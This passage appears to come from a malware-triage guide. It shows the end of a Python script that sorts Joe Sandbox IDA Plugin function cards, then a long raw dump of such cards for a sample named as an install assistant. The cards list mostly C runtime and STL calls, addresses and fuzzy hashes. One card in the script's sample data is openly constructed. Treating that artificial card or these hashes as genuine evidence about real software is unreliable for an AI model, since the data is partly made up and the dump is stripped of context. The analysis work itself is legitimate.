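• FreeLibrary.KERNEL32(00000000,?,?,6C0CF1B4), ref: 6C0CF175
• Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
• String ID: CorExitProcess$mscoree.dll
• Instruction Fuzzy Hash: 6AF08C31601119FBDF02AB90DD19B9E7EF8EB0575AF211060FC15E2490CF708B40DA92
• CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 00401000
• ResumeThread.KERNEL32(?), ref: 00401040
• Source File: constructed.sdmp, Offset: 00400000, based on PE: true
• String ID:
• Instruction Fuzzy Hash: CONSTRUCTED
"""

if __name__ == "__main__":
    for bucket, cards in triage(SAMPLE).items():
        print(bucket, [(c.offset, [a[0] for a in c.apis]) for c in cards])
```

Feed it the whole "Joe Sandbox IDA Plugin" section saved as text. The crt/stl bucket is what you skip; for everything else the ref addresses are the places to open in the .sdmp dump whose Offset the card names. The plumbing and capability sets are deliberately small and conservative: a function that calls _free next to WriteFile lands in win32, not crt/stl, so nothing the CRT does not itself call gets hidden.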
                                                          APIs
                                                          • __EH_prolog3.LIBCMT ref: 6C0C732E
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6C0C7339
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6C0C73A7
                                                            • Part of subcall function 6C0C7230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C0C7248
                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 6C0C7354
                                                          • _Yarn.LIBCPMT ref: 6C0C736A
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                          • String ID:
                                                          • API String ID: 1088826258-0
                                                          • Opcode ID: bc9210fc9f498b13352b6f7ec903ca33bf7b4157625bfc85c0516289b12440ff
                                                          • Instruction ID: 45c59611db76ce213487bceedcd7eafaa054b97e7172e08b056eb38fe8350744
                                                          • Opcode Fuzzy Hash: bc9210fc9f498b13352b6f7ec903ca33bf7b4157625bfc85c0516289b12440ff
                                                          • Instruction Fuzzy Hash: A701DFB57042149BCB06DF24C840BBC7BF1FF86254B15000AE81197780CF38AA56DBC6
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: $!$@
                                                          • API String ID: 3519838083-2517134481
                                                          • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                                          • Instruction ID: 7f229535afa36cce14165ec9a3732901ce70c797baf8a42c3c4a534014c53327
                                                          • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                                          • Instruction Fuzzy Hash: 38125B74E06249DFCB04CFA4C590ADDBBB1BF09348F14C46AE845ABB51DB31E995CBA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog__aulldiv
                                                          • String ID: $SJ
                                                          • API String ID: 4125985754-3948962906
                                                          • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                                          • Instruction ID: 3640b816a64c778e459e0b17da178cc570629f12d8b194fb49ce1b374bca28a1
                                                          • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                                          • Instruction Fuzzy Hash: 92B15BB1E05209DFCB14CF99C884AAEBBB1FF59314B20853EE515A7B50D738AA45CF90
                                                          APIs
                                                            • Part of subcall function 6C0C7327: __EH_prolog3.LIBCMT ref: 6C0C732E
                                                            • Part of subcall function 6C0C7327: std::_Lockit::_Lockit.LIBCPMT ref: 6C0C7339
                                                            • Part of subcall function 6C0C7327: std::locale::_Setgloballocale.LIBCPMT ref: 6C0C7354
                                                            • Part of subcall function 6C0C7327: _Yarn.LIBCPMT ref: 6C0C736A
                                                            • Part of subcall function 6C0C7327: std::_Lockit::~_Lockit.LIBCPMT ref: 6C0C73A7
                                                            • Part of subcall function 6BF92F60: std::_Lockit::_Lockit.LIBCPMT ref: 6BF92F95
                                                            • Part of subcall function 6BF92F60: std::_Lockit::_Lockit.LIBCPMT ref: 6BF92FAF
                                                            • Part of subcall function 6BF92F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6BF92FD0
                                                            • Part of subcall function 6BF92F60: __Getctype.LIBCPMT ref: 6BF93084
                                                            • Part of subcall function 6BF92F60: std::_Facet_Register.LIBCPMT ref: 6BF9309C
                                                            • Part of subcall function 6BF92F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6BF930B7
                                                          • std::ios_base::_Addstd.LIBCPMT ref: 6BF9211B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                          • API String ID: 3332196525-1866435925
                                                          • Opcode ID: ba7ce5e8529fea1507b47f72df751fdb75fa871f214b502648f4b6260cc00838
                                                          • Instruction ID: 86c2c66132a7525e9e06a299cd669b429aeca26d874329f1f5f3fbba819935b6
                                                          • Opcode Fuzzy Hash: ba7ce5e8529fea1507b47f72df751fdb75fa871f214b502648f4b6260cc00838
                                                          • Instruction Fuzzy Hash: E54191B1A003099FEB00DF64D8457AEBBB1BF48314F108268E9159B391D776A985CF91
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: $CK$CK
                                                          • API String ID: 3519838083-2957773085
                                                          • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                                          • Instruction ID: 42489e79fb5f75f24405519954dbd08e7fb59f211e757c281c0655f3b0cf9b4c
                                                          • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                                          • Instruction Fuzzy Hash: D6218E70E09209CBCB04DFA884906EEF7B6FB95304F64463AC512E3E91C7794A068AA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: 0$LrJ$x
                                                          • API String ID: 3519838083-658305261
                                                          • Opcode ID: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                                                          • Instruction ID: d30c84eaa5be220f3f7c930af618f3e42e14f4088553174de430dda44552ebb3
                                                          • Opcode Fuzzy Hash: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                                                          • Instruction Fuzzy Hash: 93214936D011199ACF04DF98C9A0BEDB7F5EF99708F20005AD82173640DB796E89CBA1
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C124ECC
                                                            • Part of subcall function 6C10F58A: __EH_prolog.LIBCMT ref: 6C10F58F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: :hJ$dJ$xJ
                                                          • API String ID: 3519838083-2437443688
                                                          • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                                          • Instruction ID: 31d45960e8cc0bc9f8d5c9074e0e702c3de33e26657c986efcf2c70583619d77
                                                          • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                                          • Instruction Fuzzy Hash: 6521D8B0901B40CFC760CF6AC14428ABBF4BF2A708B10C95EC4AA97B11D7B8B649CF55
                                                          APIs
                                                          • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C0DB0D0,6BF91DEA,00008000,6C0DB0D0,?,?,?,6C0DAC7F,6C0DB0D0,?,00000000,6BF91DEA), ref: 6C0DADC9
                                                          • GetLastError.KERNEL32(?,?,?,6C0DAC7F,6C0DB0D0,?,00000000,6BF91DEA,?,6C0E469E,6C0DB0D0,000000FF,000000FF,00000002,00008000,6C0DB0D0), ref: 6C0DADD3
                                                          • __dosmaperr.LIBCMT ref: 6C0DADDA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastPointer__dosmaperr
                                                          • String ID: 8Q
                                                          • API String ID: 2336955059-4022487301
                                                          • Opcode ID: 1eb604cc8cc67b31445948d990e1d2d61aa52ee537b31b1af9f271fbb3a0d0e0
                                                          • Instruction ID: 9839841b224ce3d1d044373a70d650bbf980cc1c1144397b44380d4486d556d0
                                                          • Opcode Fuzzy Hash: 1eb604cc8cc67b31445948d990e1d2d61aa52ee537b31b1af9f271fbb3a0d0e0
                                                          • Instruction Fuzzy Hash: 90018D337146157FCF058FA9DC05A9E3BB9DB853257360205F812D7680EA71F9418BA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: <J$DJ$HJ$TJ$]
                                                          • API String ID: 0-686860805
                                                          • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                                          • Instruction ID: f8a1f3c8ae00d835d8d70ca389d91bd4ca9cb420e369e6084cc3c42b00b00101
                                                          • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                                          • Instruction Fuzzy Hash: C14184B0D0A289AECF14DFA1D490AEEB774AF21308B608179D52167F50EB39A649CB11
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: __aulldiv
                                                          • String ID:
                                                          • API String ID: 3732870572-0
                                                          • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                                          • Instruction ID: ba8705e3255ebcbbc0bb7d9928a54326efe2e1a8bb819587232f673a876590b4
                                                          • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                                                          • Instruction Fuzzy Hash: 1111A276204248BFEB214BA4CC44FAFBBBDEFC6744F10882DB14556A90D676AC14D760
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,6C0CEF64,6C0F6DD8,0000000C), ref: 6C0D49B7
                                                          • _free.LIBCMT ref: 6C0D4A14
                                                          • _free.LIBCMT ref: 6C0D4A4A
                                                          • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6C0CEF64,6C0F6DD8,0000000C), ref: 6C0D4A55
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast_free
                                                          • String ID:
                                                          • API String ID: 2283115069-0
                                                          • Opcode ID: 36feddb1ca5eb3a8b9a3612ec61c52bb1cee638ac02395180bf28d21285f13bd
                                                          • Instruction ID: 0840c9032f364b636c5857ac353a752ffac629f0fd6071c8746750d99ebf34b8
                                                          • Opcode Fuzzy Hash: 36feddb1ca5eb3a8b9a3612ec61c52bb1cee638ac02395180bf28d21285f13bd
                                                          • Instruction Fuzzy Hash: 9011C1723043007BAA005BF99C84FDE25E99BC237CB670628F524A7B80DF21B90A4628
                                                          APIs
                                                          • WriteConsoleW.KERNEL32(00000000,?,6C0E46EC,00000000,00000000,?,6C0E4B51,00000000,00000001,00000000,6C0DB0D0,?,6C0DC286,?,?,6C0DB0D0), ref: 6C0E5ED1
                                                          • GetLastError.KERNEL32(?,6C0E4B51,00000000,00000001,00000000,6C0DB0D0,?,6C0DC286,?,?,6C0DB0D0,?,6C0DB0D0,?,6C0DBD1C,6C0E5AB6), ref: 6C0E5EDD
                                                            • Part of subcall function 6C0E5F2E: CloseHandle.KERNEL32(FFFFFFFE,6C0E5EED,?,6C0E4B51,00000000,00000001,00000000,6C0DB0D0,?,6C0DC286,?,?,6C0DB0D0,?,6C0DB0D0), ref: 6C0E5F3E
                                                          • ___initconout.LIBCMT ref: 6C0E5EED
                                                            • Part of subcall function 6C0E5F0F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C0E5EAB,6C0E4B3E,6C0DB0D0,?,6C0DC286,?,?,6C0DB0D0,?), ref: 6C0E5F22
                                                          • WriteConsoleW.KERNEL32(00000000,?,6C0E46EC,00000000,?,6C0E4B51,00000000,00000001,00000000,6C0DB0D0,?,6C0DC286,?,?,6C0DB0D0,?), ref: 6C0E5F02
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                          • String ID:
                                                          • API String ID: 2744216297-0
                                                          • Opcode ID: 77f36f920391fd6fca10d0937369c50c9e36571f026525491620a35233cf00d1
                                                          • Instruction ID: 3a092292e0814dd8109e052d59537bb9ba965594089d56de364d7481f404b288
                                                          • Opcode Fuzzy Hash: 77f36f920391fd6fca10d0937369c50c9e36571f026525491620a35233cf00d1
                                                          • Instruction Fuzzy Hash: 86F0C73A540125BFCF121FE5DC04AC93F76FF09765F094510FE1996560DB329960DB90
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C0FE077
                                                            • Part of subcall function 6C0FDFF5: __EH_prolog.LIBCMT ref: 6C0FDFFA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: :$\
                                                          • API String ID: 3519838083-1166558509
                                                          • Opcode ID: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                                          • Instruction ID: e39e56e55d546afe04bebe2c0c2d38987fb7de828da45796d0e6385b5be4918b
                                                          • Opcode Fuzzy Hash: 48f4411e2405fcdde49591215dd3ffd545f97566ccde13c94e17e7da02f2e48f
                                                          • Instruction Fuzzy Hash: 27E1AF309042099ADB11DFA8C894BEDB7F1BF05318F204219EC7567A91EBB5B5CBCB91
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog__aullrem
                                                          • String ID: d%K
                                                          • API String ID: 3415659256-3110269457
                                                          • Opcode ID: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                                                          • Instruction ID: 52c25bf6b0138f3112c574367613fd387830f3daf2b3e3da03f8558e709ffdf1
                                                          • Opcode Fuzzy Hash: edd8db3a4067630c511c1f9d0118cc4b792e07b2613ebc31a4b030f5161dda76
                                                          • Instruction Fuzzy Hash: 9081AE72A012099BDF00CF94C994BDEB7F5AF54348F2AC069E818AF641D775E945CBA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                           • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog3_
                                                          • String ID: 8Q
                                                          • API String ID: 2427045233-4022487301
                                                          • Opcode ID: 0f5e23da3342bf198f49f5004a60debbf9ef4aea01a3fa67cc9076ba5547ed36
                                                          • Instruction ID: 112fa967ae7571fc308711b331e58333ee64c62c08bc92f90347605d9fef096b
                                                          • Opcode Fuzzy Hash: 0f5e23da3342bf198f49f5004a60debbf9ef4aea01a3fa67cc9076ba5547ed36
                                                          • Instruction Fuzzy Hash: 2071C274D093169BDB108B95C980BFEBBF5EF0D318F164229E92067A80DB71B845CB60
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: @$hfJ
                                                          • API String ID: 3519838083-1391159562
                                                          • Opcode ID: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                                          • Instruction ID: 4ea581d31b9f160edc2889c03817d9353fcb4b66d3984f1c8fb64bf880ddf4f3
                                                          • Opcode Fuzzy Hash: 82ac28e14911e15d6061b9e8fa7e1011da5464f288955fede779c14a83bf3726
                                                          • Instruction Fuzzy Hash: D0914A74910248EFCB14DF99C884ADEFBF8BF18308F90451EE555A7A50D774AA89CB20
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C118C5D
                                                            • Part of subcall function 6C11761A: __EH_prolog.LIBCMT ref: 6C11761F
                                                            • Part of subcall function 6C117A2E: __EH_prolog.LIBCMT ref: 6C117A33
                                                            • Part of subcall function 6C118EA5: __EH_prolog.LIBCMT ref: 6C118EAA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: WZJ
                                                          • API String ID: 3519838083-1089469559
                                                          • Opcode ID: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                                          • Instruction ID: 0c1250c1d5e52385b23fda9efe7a85b61b4a90926d8c62bf0f5dbfafea0f6eb1
                                                          • Opcode Fuzzy Hash: cff2a95f7f2c9e7e47c21d6c2cae1b51bbda01fa4771d0427a5cf66fef2ba2b2
                                                          • Instruction Fuzzy Hash: FC818D31D04258DFDF15DFA8D490BDDB7B4AF19318F1080AAE91267B90DB346E49CBA0
                                                          APIs
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 6BF92A76
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                           • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ___std_exception_destroy
                                                          • String ID: Jbx$Jbx
                                                          • API String ID: 4194217158-1161259238
                                                          • Opcode ID: e0501a24b684408b6f91fb14f8027b4a7d3f638d6392cc07c273d6d8bc72e6d7
                                                          • Instruction ID: d6cbcd82296b15b790890add865d8f497c49dffb017dfcf949b34b46751c330c
                                                          • Opcode Fuzzy Hash: e0501a24b684408b6f91fb14f8027b4a7d3f638d6392cc07c273d6d8bc72e6d7
